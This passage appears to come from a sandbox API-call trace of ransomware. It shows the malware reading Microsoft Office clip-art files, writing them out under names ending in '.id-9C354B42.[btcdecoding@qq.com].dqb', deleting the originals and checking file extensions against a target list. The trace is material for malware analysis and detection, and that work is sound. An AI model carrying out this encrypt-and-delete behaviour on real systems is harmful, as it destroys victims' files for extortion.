Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0050.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0050.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0050.951] lstrlenW (lpString=".doc") returned 4 [0050.952] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.952] lstrlenW (lpString=".docx") returned 5 [0050.952] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.952] lstrlenW (lpString=".pdf") returned 4 [0050.952] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".xls") returned 4 [0050.952] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".xlsx") returned 5 [0050.952] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.952] lstrlenW (lpString=".ppt") returned 4 [0050.952] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0050.952] lstrlenW (lpString=".zip") returned 4 [0050.952] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".rar") returned 4 [0050.952] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.952] lstrlenW (lpString=".bz2") returned 4 [0050.952] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.952] lstrlenW (lpString=".7z") returned 3 [0050.952] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0050.952] lstrlenW (lpString=".dbf") returned 4 [0050.952] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0050.952] lstrlenW (lpString=".1cd") returned 4 [0050.952] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0050.952] lstrlenW (lpString=".jpg") returned 4 [0050.952] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.953] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.953] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.953] GetLastError () returned 0x0 [0050.953] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1398, lpOverlapped=0x0) returned 1 [0050.954] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x13a0, lpOverlapped=0x0) returned 1 [0050.955] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.955] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.955] SetEndOfFile (hFile=0x184) returned 1 [0050.956] CloseHandle (hObject=0x184) returned 1 [0050.956] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.956] SetEndOfFile (hFile=0x214) returned 1 [0050.957] CloseHandle (hObject=0x214) returned 1 [0050.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0050.958] lstrlenW (lpString=".doc") returned 4 [0050.958] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.958] lstrlenW (lpString=".docx") returned 5 [0050.958] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.958] lstrlenW (lpString=".pdf") returned 4 [0050.958] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString=".xls") returned 4 [0050.958] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString=".xlsx") returned 5 [0050.958] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.958] lstrlenW (lpString=".ppt") returned 4 [0050.958] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0050.958] lstrlenW (lpString=".zip") returned 4 [0050.958] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString=".rar") returned 4 [0050.958] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.958] lstrlenW (lpString=".bz2") returned 4 [0050.958] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.958] lstrlenW (lpString=".7z") returned 3 [0050.958] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0050.959] lstrlenW (lpString=".dbf") returned 4 [0050.959] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0050.959] lstrlenW (lpString=".1cd") returned 4 [0050.959] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0050.959] lstrlenW (lpString=".jpg") returned 4 [0050.959] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.959] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.960] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.960] GetLastError () returned 0x0 [0050.960] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1126, lpOverlapped=0x0) returned 1 [0050.961] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1130, lpOverlapped=0x0) returned 1 [0050.962] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.962] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.962] SetEndOfFile (hFile=0x184) returned 1 [0050.962] CloseHandle (hObject=0x184) returned 1 [0050.963] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.963] SetEndOfFile (hFile=0x214) returned 1 [0050.963] CloseHandle (hObject=0x214) returned 1 [0050.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0050.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0050.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0050.964] lstrlenW (lpString=".doc") returned 4 [0050.964] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.964] lstrlenW (lpString=".docx") returned 5 [0050.964] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.964] lstrlenW (lpString=".pdf") returned 4 [0050.964] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.964] lstrlenW (lpString=".xls") returned 4 [0050.964] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.964] lstrlenW (lpString=".xlsx") returned 5 [0050.964] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.964] lstrlenW (lpString=".ppt") returned 4 [0050.964] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0050.964] lstrlenW (lpString=".zip") returned 4 [0050.964] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.964] lstrlenW (lpString=".rar") returned 4 [0050.964] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.964] lstrlenW (lpString=".bz2") returned 4 [0050.964] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.965] lstrlenW (lpString=".7z") returned 3 [0050.965] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0050.965] lstrlenW (lpString=".dbf") returned 4 [0050.965] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0050.965] lstrlenW (lpString=".1cd") returned 4 [0050.965] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0050.965] lstrlenW (lpString=".jpg") returned 4 [0050.965] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.965] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=3966) returned 1 [0050.965] CloseHandle (hObject=0x214) returned 1 [0050.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 0x20 [0050.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.965] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.966] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.967] GetLastError () returned 0x0 [0050.968] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xf7e, lpOverlapped=0x0) returned 1 [0050.979] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0050.980] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.980] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.980] SetEndOfFile (hFile=0x184) returned 1 [0050.980] CloseHandle (hObject=0x184) returned 1 [0050.980] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.980] SetEndOfFile (hFile=0x214) returned 1 [0050.981] CloseHandle (hObject=0x214) returned 1 [0050.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.981] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0050.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0050.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0050.981] lstrlenW (lpString=".doc") returned 4 [0050.981] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.981] lstrlenW (lpString=".docx") returned 5 [0050.981] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.981] lstrlenW (lpString=".pdf") returned 4 [0050.981] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.982] lstrlenW (lpString=".xls") returned 4 [0050.982] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.982] lstrlenW (lpString=".xlsx") returned 5 [0050.982] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.982] lstrlenW (lpString=".ppt") returned 4 [0050.982] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0050.982] lstrlenW (lpString=".zip") returned 4 [0050.982] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.982] lstrlenW (lpString=".rar") returned 4 [0050.982] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.982] lstrlenW (lpString=".bz2") returned 4 [0050.982] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.982] lstrlenW (lpString=".7z") returned 3 [0050.982] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0050.982] lstrlenW (lpString=".dbf") returned 4 [0050.982] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0050.982] lstrlenW (lpString=".1cd") returned 4 [0050.982] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0050.982] lstrlenW (lpString=".jpg") returned 4 [0050.982] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.982] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.982] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.983] GetLastError () returned 0x0 [0050.983] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xd32, lpOverlapped=0x0) returned 1 [0051.216] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xd40, lpOverlapped=0x0) returned 1 [0051.240] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.240] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.240] SetEndOfFile (hFile=0x184) returned 1 [0051.240] CloseHandle (hObject=0x184) returned 1 [0051.241] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.241] SetEndOfFile (hFile=0x214) returned 1 [0051.242] CloseHandle (hObject=0x214) returned 1 [0051.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.242] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0051.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.242] lstrlenW (lpString=".doc") returned 4 [0051.242] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.242] lstrlenW (lpString=".docx") returned 5 [0051.242] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.242] lstrlenW (lpString=".pdf") returned 4 [0051.242] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.242] lstrlenW (lpString=".xls") returned 4 [0051.242] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.242] lstrlenW (lpString=".xlsx") returned 5 [0051.242] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.242] lstrlenW (lpString=".ppt") returned 4 [0051.242] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.242] lstrlenW (lpString=".zip") returned 4 [0051.242] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.243] lstrlenW (lpString=".rar") returned 4 [0051.243] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.243] lstrlenW (lpString=".bz2") returned 4 [0051.243] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.243] lstrlenW (lpString=".7z") returned 3 [0051.243] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.243] lstrlenW (lpString=".dbf") returned 4 [0051.243] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.243] lstrlenW (lpString=".1cd") returned 4 [0051.243] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0051.243] lstrlenW (lpString=".jpg") returned 4 [0051.243] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.243] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.243] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0051.243] GetLastError () returned 0x0 [0051.244] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x19e8, lpOverlapped=0x0) returned 1 [0051.245] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0051.246] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.246] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.246] SetEndOfFile (hFile=0x184) returned 1 [0051.246] CloseHandle (hObject=0x184) returned 1 [0051.246] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.246] SetEndOfFile (hFile=0x214) returned 1 [0051.247] CloseHandle (hObject=0x214) returned 1 [0051.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.247] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0051.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0051.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0051.247] lstrlenW (lpString=".doc") returned 4 [0051.247] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString=".docx") returned 5 [0051.248] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.248] lstrlenW (lpString=".pdf") returned 4 [0051.248] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString=".xls") returned 4 [0051.248] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.248] lstrlenW (lpString=".xlsx") returned 5 [0051.248] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.248] lstrlenW (lpString=".ppt") returned 4 [0051.248] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0051.248] lstrlenW (lpString=".zip") returned 4 [0051.248] lstrcmpiW 